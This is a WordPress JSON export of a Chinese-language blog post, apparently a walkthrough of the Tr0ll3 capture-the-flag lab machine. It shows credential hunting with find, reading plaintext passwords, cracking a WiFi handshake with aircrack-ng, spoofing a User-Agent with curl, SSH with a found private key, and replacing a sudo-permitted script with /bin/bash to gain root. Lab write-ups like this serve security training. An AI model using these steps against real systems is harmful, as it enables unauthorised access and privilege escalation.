{"id":302,"date":"2024-05-02T23:05:56","date_gmt":"2024-05-02T15:05:56","guid":{"rendered":"http:\/\/xiyu12.top\/?p=302"},"modified":"2024-05-02T23:05:56","modified_gmt":"2024-05-02T15:05:56","slug":"tr003","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=302","title":{"rendered":"Tr003"},"content":{"rendered":"\n
\"\"<\/div><\/figure>\n\n\n\n

ssh start@192.168.1.142 \u767b\u9646 \u83b7\u5f97shell<\/p>\n\n\n\n

find  \/ -writable -type f 2>\/dev\/null | grep -v \/proc | grep -v sys\n\/home\/start\/.bashrc\n\/home\/start\/.ssh\/known_hosts\n\/home\/start\/redpill\/this_will_surely_work\n\/home\/start\/.profile\n\/home\/start\/.bash_logout\n\/home\/start\/...\/about_time\n\/home\/start\/gold\n\/home\/start\/bluepill\/awesome_work\n\/home\/start\/.cache\/motd.legal-displayed\n\/.hints\/lol\/rofl\/roflmao\/this\/isnt\/gonna\/stop\/anytime\/soon\/still\/going\/lol\/annoyed\/almost\/there\/jk\/no\/seriously\/last\/one\/rofl\/ok\/ill\/stop\/however\/this\/is\/fun\/ok\/here\/rofl\/sorry\/you\/made\/it\/gold_star.txt\n\ncat \/home\/start\/...\/about_time\neagle:oxxwJo\n<\/code><\/pre>\n\n\n\n
ssh eagle@192.168.1.142  \u767b\u9646 \u5230eagle<\/p>\n\n\n\n
sudo -l\n[sudo] password for eagle: \nMatching Defaults entries for eagle on Tr0ll3:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser eagle may run the following commands on Tr0ll3:\n    (root) \/usr\/sbin\/service vsftpd start\nsudo \/usr\/sbin\/service vsftpd start\nftp 192.168.1.142  \u4f7f\u7528anonymous \u767b\u9646  \u83b7\u5f97wytshadow.cap \u6587\u4ef6<\/code><\/pre>\n\n\n\n
find \/ -writable -type f 2>\/dev\/null | grep -v \/proc  | grep -v sys\n\/var\/log\/.dist-manage\/wytshadow.cap\n\/home\/eagle\/.bashrc\n\/home\/eagle\/.profile\n\/home\/eagle\/.bash_logout\n\/home\/eagle\/.bash_history\n\/home\/eagle\/.cache\/motd.legal-displayed\n\/.hints\/lol\/rofl\/roflmao\/this\/isnt\/gonna\/stop\/anytime\/soon\/still\/going\/lol\/annoyed\/almost\/there\/jk\/no\/seriously\/last\/one\/rofl\/ok\/ill\/stop\/however\/this\/is\/fun\/ok\/here\/rofl\/sorry\/you\/made\/it\/gold_star.txt<\/code><\/pre>\n\n\n\n
\u4f7f\u7528wireshark  \u6253\u5f00cap \u6587\u4ef6  \u8fdb\u884c\u6d41\u91cf\u5206\u6790 \u53d1\u73b0\u6709802.11\u5e27  \u662fwifi\u7684\u6d41\u91cf<\/p>\n\n\n\n
WEP\u6216\u8005WAP\u52a0\u5bc6  \u89e3\u5bc6\u901a\u8fc7wireshak\u7684\u7f16\u8f91 -> \u9996\u9009\u9879 -> Protocols -> IEEE 802.11 \uff0c\u70b9\u51fbEdit<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u901a\u8fc7airdecap-ng\u5de5\u5177\u7206\u7834\u5bc6\u7801<\/p>\n\n\n\n
aircrack-ng hanshake.cap -w\u00a0gold_star.txt<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u83b7\u5f97\u5bc6\u7801gaUoCe34t1  ssh wytshadow@192.168.1.142 \u767b\u9646wytshadow<\/p>\n\n\n\n
sudo -l\n[sudo] password for wytshadow: \nMatching Defaults entries for wytshadow on Tr0ll3:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser wytshadow may run the following commands on Tr0ll3:\n    (root) \/usr\/sbin\/service nginx start\n\nsudo \/usr\/sbin\/service nginx start\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u53d1\u73b0  \u65e0\u6cd5\u8bbf\u95ee <\/p>\n\n\n\n
find \/ -name nginx 2>\/dev\/null<\/p>\n\n\n\n
\/var\/lib\/nginx\n\/var\/log\/nginx\n\/var\/nginx\n\/etc\/init.d\/nginx\n\/etc\/logrotate.d\/nginx\n\/etc\/default\/nginx\n\/etc\/nginx\n\/etc\/ufw\/applications.d\/nginx\n\/usr\/sbin\/nginx\n\/usr\/lib\/nginx\n\/usr\/share\/nginx\n\/usr\/share\/doc\/nginx\n\ncd \/etc\/nginx\nls\nconf.d          koi-utf     modules-available  proxy_params     sites-enabled  win-utf\nfastcgi.conf    koi-win     modules-enabled    scgi_params      snippets\nfastcgi_params  mime.types  nginx.conf         sites-available  uwsgi_params\ncd sites-enabled\ncat default<\/code><\/pre>\n\n\n\n
\nserver {\n        listen 8080 default_server;\n        listen [::]:8080 default_server;\n                if ($http_user_agent !~ \"Lynx*\"){\n    return 403;\n}\n    <\/code><\/pre>\n\n\n\n
curl http:\/\/192.168.1.142:8080 -H ‘User-Agent:Lynx’<\/p>\n\n\n\n
genphlux:HF9nd0cR!<\/p>\n\n\n\n
ssh  genphlux@192.168.1.142  \u767b\u9646genphlux<\/p>\n\n\n\n
sudo -l \n[sudo] password for genphlux: \nMatching Defaults entries for genphlux on Tr0ll3:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser genphlux may run the following commands on Tr0ll3:\n    (root) \/usr\/sbin\/service apache2 start\nsudo \/usr\/sbin\/service apache2 start\n <\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f7f\u7528 \u79c1\u94a5\u6587\u4ef6  chmod 600 maleus <\/p>\n\n\n\n
ssh -i .\/maleus maleus@192.168.1.142   \u767b\u9646maleus  <\/p>\n\n\n\n
cat .viminfo<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
B^slc8I$  \u5f97\u5230maleus  \u7684\u5bc6\u7801<\/p>\n\n\n\n
[sudo] password for maleus: \nMatching Defaults entries for maleus on Tr0ll3:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser maleus may run the following commands on Tr0ll3:\n    (root) \/home\/maleus\/dont_even_bother\n\u5728\u5bb6\u76ee\u5f55 \nrm dont_even_bother\nvim dont_even_bother\n\/bin\/bash\nsudo dont_even_bother\n<\/code><\/pre>\n\n\n\n
\u83b7\u5f97root<\/p>\n","protected":false},"excerpt":{"rendered":"
ssh start@192.168.1.142 \u767b\u9646 \u83b7\u5f97shell ssh eagle@192.168.1. […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[14,18,50,85,99],"class_list":["post-302","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-viminfo","tag-aircrack-ng-wifi","tag-nginx-sites-enabled","tag-ssh","tag-wireshark"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=302"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/302\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=302"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}